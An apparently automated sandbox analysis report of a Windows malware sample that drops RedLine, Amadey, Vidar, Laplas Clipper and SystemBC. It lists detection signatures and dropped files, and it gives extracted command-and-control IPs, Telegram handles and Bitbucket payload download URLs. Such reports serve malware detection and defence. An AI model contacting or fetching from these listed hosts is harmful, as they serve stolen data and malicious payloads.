Windows Analysis Report
DQxttu2Qrr.exe

Overview

General Information

Sample Name: DQxttu2Qrr.exe
Analysis ID: 764033
MD5: 7434b42e11380272961c92e061072e78
SHA1: a2dea715e33a860dc09d09b219db18831e6bb1a5
SHA256: 9922432bfa7768bdfb6e8b079c90744c9f3d33a5a258a97abc8519f81a680e40
Tags: 32, ArkeiStealer, exe, trojan

Detection

Amadey, Laplas Clipper, RedLine, SystemBC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Yara detected Laplas Clipper
System process connects to network (likely due to code injection or exploit)
Yara detected SystemBC
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Creates multiple autostart registry keys
Query firmware table information (likely to detect VMs)
Uses cmd line tools excessively to alter registry or file data
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect debuggers (CloseHandle check)
Allocates memory in foreign processes
Injects a PE file into a foreign process
Tries to evade analysis by executing special instructions (VM detection)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Uses powercfg.exe to modify the power settings
Hides threads from debuggers
Modifies power options to not sleep / hibernate
Overwrites code with function prologues
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Self deletion via cmd or bat file
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Modifies the hosts file
Yara detected Generic Downloader
Found hidden mapped module (file has been removed from disk)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to steal Instant Messenger accounts or passwords
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Checks if the current process is being debugged
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
PE / OLE file has an invalid certificate

Classification

AV Detection

Source: http://65.21.119.56:80 Avira URL Cloud: Label: malware
Source: http://65.21.119.56:80/update.zip Avira URL Cloud: Label: malware
Source: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963 Avira URL Cloud: Label: malware
Source: http://167.235.150.8:80 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jekppnay.tmp Avira: detection malicious, Label: HEUR/AGEN.1236196
Source: DQxttu2Qrr.exe ReversingLabs: Detection: 36%
Source: C:\ProgramData\61312899942613011832.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\1000019012\syncfiles.dll ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\advapi32.dll ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\jekppnay.tmp ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Locktime\RtkAudUService64.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\Locktime\RtkAudUService64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\advapi32.dll Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe Joe Sandbox ML: detected
Source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["http://65.21.119.56:80", "https://t.me/vmt001"], "Botnet": "1760", "Version": "56.1"}
Source: 4.2.61312899942613011832.exe.1150000.0.unpack Malware Configuration Extractor: Amadey {"C2 url": "85.209.135.109/jg94cVd30f/index.php", "Version": "3.50"}
Source: DQxttu2Qrr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DQxttu2Qrr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Carafej mamib cemike\xiwati\Dedexaj wahiraje\jeweyohe kajexef.pdb source: umciavi64.exe, 00000031.00000002.647446249.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp, umciavi64.exe, 00000031.00000000.425031565.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 192.168.2.3 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 89.22.236.225 4193
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 85.209.135.109 80
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Malware configuration extractor URLs: 85.209.135.109/jg94cVd30f/index.php
Source: Malware configuration extractor URLs: http://65.21.119.56:80
Source: Malware configuration extractor URLs: https://t.me/vmt001
Source: Joe Sandbox View ASN Name: CP-ASDE
Source: Joe Sandbox View ASN Name: INETLTDTR
Source: Joe Sandbox View IP Address: 89.22.236.225
Source: Joe Sandbox View IP Address: 104.192.141.1
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://167.235.150.8:80
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://65.21.119.56:80
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://65.21.119.56:80/update.zip
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://65.21.119.56:80https://t.me/vmt001hello0;open_open
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp String found in binary or memory: http://cjDliFVN3QKbi0ymi0MA.WclWOx4jCqZsNQbjvsAivMLJa9uT5DhrasATByTHQ5iENK14UsJkLrDsnRarngdZ7r0MiULb
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/)a
Source: powershell.exe, 00000020.00000002.716445080.000001A0AC6A4000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ripple-wells-2022.net/
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000020.00000002.656197895.000001A094341000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331524675.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: avicapn32.exe, 0000001B.00000002.857905860.00000000017DE000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.zlib.net/D
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/E
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/H
Source: umciavi64.exe, 00000031.00000003.561824002.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/down.
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b803c041-f8b5-
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b97f81fe-0ba4-
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/cba79466-746d-
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/l
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/D
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597
Source: umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.631988058.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.642766425.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.bin
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.binIua2gnOxsYQNjWglYDZ3357MMJTmqF
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin6
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin8
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binR
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binin
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binl
Source: umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin0c9c7142b75e/library.bin
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin8
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bind
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.binn
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bint
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/versal
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/ww
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000020.00000003.420288387.000001A095FA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000020.00000002.719705380.000001A0AC974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe String found in binary or memory: https://sectigo.com/CPS0
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199441933804
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=update_error
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/installer/?product=
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/dishasta
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/dishastahttps://steamcommunity.com/profiles/76561199441933804http://167.235.150.8:80dis
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://t.me/vmt001
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: DQxttu2Qrr.exe, 00000000.00000002.328859576.0000000027DCD000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: DQxttu2Qrr.exe, 00000000.00000003.264721352.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c
Source: 61312899942613011832.exe, 00000004.00000002.326390178.000000000084A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 61312899942613011832.exe.0.dr Static PE information: section name: lB@dO\ih
Source: 61312899942613011832.exe.0.dr Static PE information: section name: Fh?jG[OJ
Source: 61312899942613011832.exe.0.dr Static PE information: section name: qNR5:WbS
Source: 61312899942613011832.exe.0.dr Static PE information: section name: z?fd8ijJ
Source: 61312899942613011832.exe.0.dr Static PE information: section name: CV?7x>JO
Source: 61312899942613011832.exe.0.dr Static PE information: section name: dT<:EHzj
Source: 61312899942613011832.exe.0.dr Static PE information: section name: @]topACL
Source: nppshell[1].exe.0.dr Static PE information: section name: lB@dO\ih
Source: nppshell[1].exe.0.dr Static PE information: section name: Fh?jG[OJ
Source: nppshell[1].exe.0.dr Static PE information: section name: qNR5:WbS
Source: nppshell[1].exe.0.dr Static PE information: section name: z?fd8ijJ
Source: nppshell[1].exe.0.dr Static PE information: section name: CV?7x>JO
Source: nppshell[1].exe.0.dr Static PE information: section name: dT<:EHzj
